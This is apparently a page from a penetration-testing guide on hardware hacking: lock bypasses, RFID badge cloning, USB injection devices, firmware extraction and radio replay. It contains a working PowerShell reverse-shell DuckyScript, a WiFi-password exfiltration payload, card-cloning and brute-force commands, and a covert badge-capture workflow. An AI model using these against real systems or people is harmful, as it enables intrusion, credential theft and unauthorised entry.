Hardware Hacking

Overview

Hardware security testing involves physical attacks on devices, firmware analysis, and embedded systems exploitation.

Physical Security Testing

Lock Picking Basics

# Common lock types:
# - Pin tumbler locks (most common)
# - Wafer locks (cheaper, easier)
# - Disc detainer locks (high security)
# - Tubular locks (vending machines)

# Basic tools:
# - Tension wrench (bottom of keyway)
# - Single pin picks (hook, diamond, ball)
# - Rake picks (bogota, snake, city)
# - Electric pick guns (snap guns)

# Technique:
# 1. Insert tension wrench, apply slight rotational pressure
# 2. Insert pick above tension wrench
# 3. Feel for binding pin
# 4. Push binding pin to shear line
# 5. Repeat until all pins set
# 6. Lock opens with tension

# Practice locks:
# - Clear/cutaway locks for learning
# - Progressive pin sets
# - Increasingly difficult locks

Bypass Techniques

# Common physical bypasses:
# - Shove tools (under door)
# - Latch slipping (credit card)
# - Door gap tools (under door lever)
# - REX (Request to Exit) sensor abuse
# - Tailgating/piggybacking

# Electronic lock bypasses:
# - Magnet attacks on mag locks
# - Shock attacks (hitting door)
# - Power cutting (NC vs NO)
# - Controller attacks (exposed wiring)

# Key impressioning:
# - Insert blank key
# - Turn with force (marks binding pins)
# - File marks
# - Repeat until key works

RFID/NFC Attacks

RFID Technology

# Frequencies:
# - LF (125-134 KHz): HID, EM4100 (older access cards)
# - HF (13.56 MHz): MIFARE, iClass, NFC
# - UHF (860-960 MHz): Inventory tracking

# Common card types:
# - EM4100 (read-only, easily cloned)
# - HID ProxCard II (common access cards)
# - MIFARE Classic (known crypto weaknesses)
# - MIFARE DESFire (more secure)
# - iClass (HID, variable security)

Proxmark3 Usage

# Proxmark3 - universal RFID tool
# https://github.com/RfidResearchGroup/proxmark3

# Identify card type
pm3 --> auto

# Low Frequency (125 KHz)
# Read LF card
pm3 --> lf search

# Clone EM4100 to T5577
pm3 --> lf em 410x clone --id 0102030405

# Read HID ProxCard
pm3 --> lf hid reader

# Clone HID to T5577
pm3 --> lf hid clone -r 2004263159

# Brute force HID facility codes
pm3 --> lf hid brute --fc 1 --cn 1-65535

# High Frequency (13.56 MHz)
# Read HF card
pm3 --> hf search

# MIFARE Classic attacks
# Read with known keys
pm3 --> hf mf autopwn

# Dump card
pm3 --> hf mf dump

# Clone MIFARE
pm3 --> hf mf cload -f dump.bin

# iClass attacks
pm3 --> hf iclass reader
pm3 --> hf iclass dump

Flipper Zero Usage

# Flipper Zero - portable multi-tool

# RFID reading/emulation
# Read 125 KHz card
# Flipper menu: RFID -> Read

# Emulate cloned card
# Flipper menu: RFID -> Saved -> [card] -> Emulate

# NFC reading
# Flipper menu: NFC -> Read

# SubGHz (garage doors, car fobs)
# Read signal: SubGHz -> Read
# Replay: SubGHz -> Saved -> [signal] -> Send
# Brute force rolling codes (research only!)

# Infrared (TV remotes)
# Flipper menu: Infrared -> Read

# BadUSB
# Upload DuckyScript payloads via qFlipper
# Flipper menu: Bad USB -> [script]

Badge Cloning Attack

# Attack workflow:

# 1. Identify badge type
# - Visual inspection
# - Proxmark3 auto-detect
pm3 --> auto

# 2. Capture card data
# Long-range reader in elevator/turnstile
# Or get close with Proxmark3

# 3. Clone to writable card
# T5577 for LF
# Magic MIFARE for HF
pm3 --> lf hid clone -r <data>

# 4. Test cloned badge
# Use at access point

# Long-range readers:
# - HID MaxiProx (up to 8 feet)
# - Custom long-range antennas
# - Concealed readers (bag/backpack)

USB Attacks

Rubber Ducky / BadUSB

# USB Rubber Ducky - keystroke injection
# Appears as keyboard, types pre-programmed payloads

# DuckyScript example - reverse shell
# payload.txt
DELAY 500
GUI r
DELAY 200
STRING powershell -w hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

# Compile with encoder
java -jar encoder.jar -i payload.txt -o inject.bin

# Copy inject.bin to Ducky SD card

USB Armory / LAN Turtle

# USB Armory - full Linux computer in USB form factor
# Uses:
# - MITM attacks
# - Network implant
# - Hardware security module

# LAN Turtle - covert network implant
# Looks like USB ethernet adapter
# Features:
# - Remote shell access
# - Network scanning
# - Credential harvesting
# - DNS spoofing

# Configuration via turtle shell
ssh [email protected]

# Modules:
# - autossh (persistent reverse shell)
# - responder (credential capture)
# - nmap-scan
# - dns-spoof

O.MG Cable

# O.MG Cable - malicious USB cable
# Looks like normal charging cable
# Contains WiFi-enabled implant

# Features:
# - Keystroke injection
# - WiFi command & control
# - Geofencing (activate in specific location)
# - Self-destruct capability

# Setup:
# 1. Connect to O.MG WiFi network
# 2. Access web interface (192.168.4.1)
# 3. Configure payload
# 4. Deploy cable

# Example payload (exfil WiFi passwords)
REM Windows WiFi Password Extraction
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING netsh wlan export profile key=clear folder=C:\Temp
ENTER
# Then exfiltrate via HTTP/DNS

IoT Testing

Firmware Analysis

# Extract firmware
# From device flash chip
# From vendor website
# From OTA update

# Using binwalk
binwalk -e firmware.bin
binwalk -Me firmware.bin  # Matryoshka extraction

# Find interesting files
grep -r "password\|secret\|key" _firmware.bin.extracted/
strings firmware.bin | grep -i "admin\|root\|pass"

# Analyze file system
cd _firmware.bin.extracted/squashfs-root/
cat etc/passwd
cat etc/shadow
find . -name "*.conf" -exec grep -l "password" {} \;

# Look for hardcoded credentials
grep -r "ADMIN\|root:.*:\|password.*=" .

# Find encryption keys
find . -name "*.pem" -o -name "*.key" -o -name "*.crt"

UART/Serial Access

# UART = Universal Asynchronous Receiver/Transmitter
# Common debug interface on IoT devices

# Identifying UART pins:
# - GND: Connect multimeter to known ground
# - VCC: Usually 3.3V or 5V
# - TX: Fluctuates when device boots
# - RX: Stable, connected to input

# Tools:
# - USB to TTL adapter (FTDI, CP2102)
# - Logic analyzer
# - JTAGulator (automated pin finding)

# Connection (115200 baud is common)
screen /dev/ttyUSB0 115200
# or
minicom -D /dev/ttyUSB0 -b 115200

# Common baud rates: 9600, 19200, 38400, 57600, 115200

# Look for:
# - Boot loader access (U-Boot)
# - Root shell
# - Debug information

JTAG/SWD Debug

# JTAG = Joint Test Action Group (debug interface)
# SWD = Serial Wire Debug (ARM alternative)

# Identifying JTAG pins:
# - TDI (Test Data In)
# - TDO (Test Data Out)
# - TMS (Test Mode Select)
# - TCK (Test Clock)
# - TRST (Test Reset - optional)

# Tools:
# - JTAGulator
# - Bus Pirate
# - FT2232H breakout
# - Segger J-Link

# Using OpenOCD
openocd -f interface/jlink.cfg -f target/stm32f1x.cfg

# Connect with GDB
arm-none-eabi-gdb
(gdb) target remote :3333
(gdb) monitor reset halt
(gdb) x/100x 0x08000000  # Dump flash

# Extract firmware via JTAG
dump_image firmware.bin 0x08000000 0x10000

SPI Flash Extraction

# SPI flash chips store firmware
# Can be read directly with hardware

# Tools:
# - SPI flash programmer (CH341A)
# - Bus Pirate
# - Raspberry Pi

# Identify chip:
# Look for 8-pin chip (SOIC-8)
# Read markings (e.g., W25Q64, MX25L128)

# Using flashrom with CH341A
flashrom -p ch341a_spi -r firmware_dump.bin

# Using Bus Pirate
flashrom -p buspirate_spi:dev=/dev/ttyUSB0 -r firmware.bin

# Verify dump integrity
flashrom -p ch341a_spi -v firmware_dump.bin

# Analyze extracted firmware
binwalk -e firmware_dump.bin

Wireless Analysis

SDR (Software Defined Radio)

# SDR allows analyzing radio frequencies

# Hardware:
# - RTL-SDR (~$25)
# - HackRF One (~$300)
# - YARD Stick One (sub-GHz)
# - Ubertooth (Bluetooth)

# Install tools
apt install gqrx-sdr rtl-sdr gnuradio

# Scan frequencies
gqrx

# Record signal
rtl_sdr -f 433920000 -s 2000000 capture.bin

# Analyze with Universal Radio Hacker (URH)
# https://github.com/jopohl/urh
urh

# Replay attacks
# Capture signal -> Analyze -> Replay
# Works on simple systems (garage doors, doorbells)

Zigbee/Z-Wave

# Zigbee (2.4 GHz) - smart home protocol
# Z-Wave (908 MHz US / 868 MHz EU)

# Zigbee analysis with Killerbee
# https://github.com/riverloopsec/killerbee

# Sniff Zigbee traffic
zbstumbler
zbdump -c 11 -w capture.pcap

# Replay Zigbee packets
zbreplay -r capture.pcap

# Z-Wave analysis
# Requires Z-Wave controller (Zniffer)
# Look for unencrypted traffic

Tools Reference

# Hardware tools:
# - Proxmark3 (RFID/NFC)
# - Flipper Zero (multi-tool)
# - USB Rubber Ducky
# - Bash Bunny
# - LAN Turtle
# - O.MG Cable
# - HackRF One (SDR)
# - YARD Stick One
# - Ubertooth (Bluetooth)
# - Bus Pirate
# - JTAGulator
# - Logic Analyzer

# Software:
# - binwalk (firmware analysis)
# - firmwalker (firmware analysis)
# - flashrom (SPI flash)
# - OpenOCD (JTAG/SWD)
# - GNU Radio (SDR)
# - URH (Universal Radio Hacker)
# - Killerbee (Zigbee)

# Resources:
# - https://github.com/adi0x90/attifyos
# - https://www.pentestpartners.com/security-blog/
# - https://rtl-sdr.com/

Resources

PreviousReporting NextPurple Team

Last updated 8 days ago

Was this helpful?

hashtagOverview

hashtagPhysical Security Testing

hashtagLock Picking Basics

hashtagBypass Techniques

hashtagRFID/NFC Attacks

hashtagRFID Technology

hashtagProxmark3 Usage

hashtagFlipper Zero Usage

hashtagBadge Cloning Attack

hashtagUSB Attacks

hashtagRubber Ducky / BadUSB

hashtagUSB Armory / LAN Turtle

hashtagO.MG Cable

hashtagIoT Testing

hashtagFirmware Analysis

hashtagUART/Serial Access

hashtagJTAG/SWD Debug

hashtagSPI Flash Extraction

hashtagWireless Analysis

hashtagSDR (Software Defined Radio)

hashtagZigbee/Z-Wave

hashtagTools Reference

hashtagResources

Overview

Physical Security Testing

Lock Picking Basics

Bypass Techniques

RFID/NFC Attacks

RFID Technology

Proxmark3 Usage

Flipper Zero Usage

Badge Cloning Attack

USB Attacks

Rubber Ducky / BadUSB

USB Armory / LAN Turtle

O.MG Cable

IoT Testing

Firmware Analysis

UART/Serial Access

JTAG/SWD Debug

SPI Flash Extraction

Wireless Analysis

SDR (Software Defined Radio)

Zigbee/Z-Wave

Tools Reference

Resources